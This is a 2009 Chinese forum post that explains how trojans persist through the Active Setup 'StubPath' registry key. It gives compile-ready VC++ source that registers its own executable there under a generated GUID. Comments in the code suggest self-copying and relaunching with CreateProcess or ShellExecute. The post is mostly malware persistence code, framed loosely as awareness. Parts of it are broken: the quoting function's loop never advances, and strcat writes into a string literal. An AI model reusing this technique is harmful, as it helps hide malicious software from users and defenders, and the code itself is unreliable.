|
|
过一个国外的木马,怎么找也找不到它的自启动项,最后跟踪启动日志才找到它,原来它用的就ActiveX启动自己
目前国内也有好多木马也支持这种方式启动自己,我只是给出一个例子,希望大家以后见到了不会怕它们.
下面是代码,用VC新一个Application工程(带基本结构的)把代码直接贴上就可以编译
CODE:// ActiveX to Start Up.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include "winreg.h"
#include "windows.h"
#include <objbase.h>
#include <stdio.h>
#include <Tchar.h>
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
#pragma comment (lib, "Ws2_32.lib")
//--生成GUID
const char* newGUID() //GUID生成函数
{
static char buf[64] = {0};
GUID guid;
if (S_OK == ::CoCreateGuid(&guid))
{
_snprintf(buf, sizeof(buf)
, "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}"
, guid.Data1
, guid.Data2
, guid.Data3
, guid.Data4[0], guid.Data4[1]
, guid.Data4[2], guid.Data4[3], guid.Data4[4], guid.Data4[5]
, guid.Data4[6], guid.Data4[7]
);
}
return (const char*)buf;
}
const char * WINAPI CheckREG() //启动项测试函数
{
HKEY hkey,tmpkey;
//LPCTSTR RDkey="Software\\Microsoft\\MePath";
//long regMP=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE,RDkey, 0, KEY_READ|KEY_WRITE, &hkey));
if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\MePath",&hkey)!=ERROR_SUCCESS)
{
RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft",&tmpkey);
RegCreateKey(tmpkey,"MePath",&hkey);
RegCloseKey(tmpkey);
}
LPBYTE oGet=new BYTE[80];
DWORD typeMP=REG_SZ;
DWORD cbData=80;
long ret1=::RegQueryValueEx(hkey, "ShellPath", NULL,&typeMP, oGet, &cbData);
if(ret1!=ERROR_SUCCESS)
{
//--COM初始化
CoInitialize(NULL);
//这里是可以生成这个键
oGet=(LPBYTE)newGUID();//GUID生成函数
//设置ShellPath项为 oGet
::RegSetValueEx(hkey,"ShellPath\0",NULL,REG_SZ,(const unsigned char *)oGet,strlen((const char *)oGet));
//设置(默认)项为 oGet
//::RegSetValueEx(hkey,NULL,NULL,REG_SZ,(const unsigned char *)oGet,strlen((const char *)oGet));
//关闭COM
CoUninitialize();
}
RegCloseKey(hkey);
return(const char*)oGet;
}
const char * WINAPI CheckStartUP(unsigned char * MyPaths)
{
HKEY hkey,tmpkey;
char * pp="SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\";
LPCTSTR RDkey={0};
const char * MyGuid=CheckREG();
RDkey=(LPCTSTR)strcat(pp,MyGuid);
//long regMP=RegOpenKey(HKEY_LOCAL_MACHINE,RDkey,&hkey);
if(RegOpenKey(HKEY_LOCAL_MACHINE,RDkey,&hkey)!=ERROR_SUCCESS)
{
RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components",&tmpkey);
RegCreateKey(tmpkey,MyGuid,&hkey);
RegCloseKey(tmpkey);
//return ("1");
}
LPBYTE oGet=new BYTE[80];
DWORD typeMP=REG_SZ;
DWORD cbData=80;
long ret1=::RegQueryValueEx(hkey, "StubPath\0", NULL,&typeMP, oGet, &cbData);
if(ret1!=ERROR_SUCCESS)
{
oGet=MyPaths;
RegSetValueEx(hkey,"StubPath\0",NULL,REG_SZ,(const unsigned char *)oGet,strlen((const char *)oGet));
}
RegCloseKey(hkey);
return(const char*)oGet;
}
unsigned char * changme(const char *kk) //把字符串前后各加一个 ",以方便在命令行运行时可以作为一个字串看待
{
int kklen,i;
kklen=strlen(kk);
char *szkk=new char[kklen+1];
szkk[0]='\"';
i=0;
while(kk!='\0')
{
szkk=kk;
};
szkk='\"';
return (unsigned char *)szkk;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
if(stricmp(lpCmdLine,"")==0)
{
char szFilePath[MAX_PATH]={0};
const char * mereg;
//在此之前可以加一些复制自己到目标文件夹的代码
::GetModuleFileName(NULL, szFilePath, MAX_PATH);
mereg=CheckStartUP(changme(szFilePath));
MessageBox(NULL,mereg,"\tOK\0",0);//这句有点问题,不知道为什么,总是有点乱码,有朋友能帮我解决下吗??
//这句在真正运用的时候,可以换CreateProcess或
//ShellExecute来运行带参数的程序实例,让程序可以运行其它功能
//记得重新运行的时候,后面要带参数,随便什么字符都可以 ,只要lpCmdLine不为空就行?:)
}
else
{
//
MessageBox(NULL,"工作正常","PL",0);
}
return 0;
} |
|
发表于 2009-7-2 06:30:07